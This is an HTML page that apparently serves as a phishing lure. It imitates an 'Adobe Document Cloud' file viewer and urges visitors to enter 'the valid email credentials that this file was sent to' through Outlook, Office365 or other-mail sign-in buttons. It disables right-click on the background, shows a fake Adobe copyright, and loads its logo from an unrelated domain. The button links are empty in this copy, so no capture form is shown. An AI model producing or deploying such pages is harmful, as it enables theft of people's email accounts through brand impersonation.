<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Adobe</title>
    <script type="text/javascript">
        function disableRightClick(event) {
            event.preventDefault(); // prevent default right-click behavior
        }
    </script>
    <style>
        *{
            margin: 0;

        }
        body{
           
        }
        .container{
            border: 3px solid;
            position: absolute;
            margin: auto;
            background-color: black;
            color: white;
            opacity: 0.6;
            border-color: black;
            border-radius: 15px;
            height: 490px;
            width:34% ;
            top: 50%;
			left: 52%;
			transform: translate(-50%, -50%);
            padding: 20px;
        }
        .section{
            position: absolute;
            width: 40%;
             top: 43%;
			left: 48%;
			transform: translate(-50%, -40%);
            color: aliceblue;
            margin-left: 130px;
            margin-bottom;: 200px
        }
        .img1{
            width: 100%;
            height: 100%;
            filter: blur(5px); 
            position: fixed
        }
        .img2{
            width: 100px;
            border-radius: 5px;
            padding-left: 155px;


        }
        .header1{
         padding-left: 95px;
         font-weight: 900;
         font-size: larger;
         padding-top: 5px;

        }
        .header2{
            font-weight: 100;
         font-size: larger;
         padding-top: 8px;
        }
        button{
            width: 400px;
            height: 40px;
            margin-top: 10px;
            color: white;
            padding-right: 130px;
            font-weight: bold;
            font-size: medium;
        }
        .img-outlook{
            position: absolute;
            width: 39px;
            background-color: blue;
           top: 210px ;
        }
        .img-office{
            position: absolute;
            width: 39px;
            background-color: blue;
           top: 278px ;
        }
        .img-other{
            position: absolute;
            width: 39px;
            background-color: blue;
           top: 346px ;
        }
        .bottom-header1{
            font-weight: bold; 
            padding-left: 47px;

        }
        .bottom-header2{
            padding-left: 58px;

        }
        @media only screen and (max-width: 767px){
              *{
            margin: 0;

        }
        body{
           
        }
        .container{
            border: 3px solid;
            position: absolute;
            margin: auto;
            background-color: black;
            color: white;
            opacity: 0.6;
            border-color: black;
            border-radius: 15px;
            height: 490px;
            width:70% ;
            top: 50%;
			left: 50%;
			transform: translate(-50%, -50%);
            padding: 20px;
        }
        .section{
            position: absolute;
            width: 80%;
             top: 53%;
			left: 50%;
			transform: translate(-50%, -50%);
            color: aliceblue;
            margin-left: 30px;
            margin-bottom:0px
        }
        .img1{
            width: 100%;
            height: 100%;
            filter: blur(5px); 
            position: fixed
        }
        .img2{
            width: 60px;
            border-radius: 5px;
            padding-left: 75px;


        }
        .header1{
         padding-left: 9px;
         font-weight: 900;
         font-size: larger;
         padding-top: 5px;

        }
        .header2{
            font-weight: 100;
         font-size: larger;
         padding-top: 8px;
        }
        button{
            width: 250px;
            height: 40px;
            margin-top: 10px;
            color: white;
            padding-right: 10px;
            font-weight: bold;
            font-size: medium;
        }
        .img-outlook{
            position: absolute;
            width: 39px;
            background-color: blue;
           top: 215px ;
        }
        .img-office{
            position: absolute;
            width: 39px;
            background-color: blue;
           top: 283px ;
        }
        .img-other{
            position: absolute;
            width: 36px;
            background-color: blue;
           top: 352px ;
        }
        .bottom-header1{
            font-weight: bold; 
            padding-left: 0px;

        }
        .bottom-header2{
            padding-left: 28px;

        }

        }
    </style>
</head>
<body>
    <img class="img1" oncontextmenu="disableRightClick(event)" src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Ftse2.mm.bing.net%2Fth%3Fid%3DOIP.9vSPTO6zgY_hbGpRZJ_p5AHaEo%26pid%3DApi&f=1&ipt=abf4fd561470e770a01e4bd3ea76b854843d775931780551f091bd426cf754cd&ipo=images">
    <div class="container">
      
    </div>
    <div class="section">
        <img class="img2" src="https://xmz-productions.com.ng/adobe.jfif">
        <h1 class="header1">Adobe Document Cloud</h1>
        <p class="header2">To read the document, please enter with the valid<br>
        <span style="padding-left: 30px; "> email credentials that this file was sent to.</span></p><br>
        <a href=""><button style="background-color: blue; border-color: blue;">Sign in with Outlook</button></a><br><br>
        <img class="img-outlook" src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Ftse4.mm.bing.net%2Fth%3Fid%3DOIP.d8c4YM3NIRuHiuEJT_bTzAHaHa%26pid%3DApi&f=1&ipt=6bee72c1fd3677475d3ba4113051406ced4ba353de7fe5b7505e4a97dac95f9f&ipo=images">
        <a href=""><button style="background-color: red ; border-color: red;">Sign in with Office365</button></a><br><br>
        <img class="img-office" src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Ftse1.mm.bing.net%2Fth%3Fid%3DOIP.zTNhxuztwg_a3Yd64nh7BAHaHa%26pid%3DApi%26h%3D160&f=1&ipt=ec28717d6ee42e99860d407885864a03edb9e5de5c77cde09efe4bc41739c8f5&ipo=images">
        <a href=""><button style="background-color: blue; border-color: blue;">Sign in with Other Mail</button></a><br>
        <img class="img-other" src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Ftse1.mm.bing.net%2Fth%3Fid%3DOIP.MvrHgBzLaVfvb9k54h2iqwHaHa%26pid%3DApi%26h%3D160&f=1&ipt=baf20663189383dcbcbf62d3361d189dc1787d4d04b27b1ab48bbb7854011842&ipo=images"><br>
        <p class="bottom-header1 ">
             Select your email provider to view Document<br><br>
        
        <span class="bottom-header2">CopyRight© 2023 Adobe.</span></p>
    </div>
</body>
</html>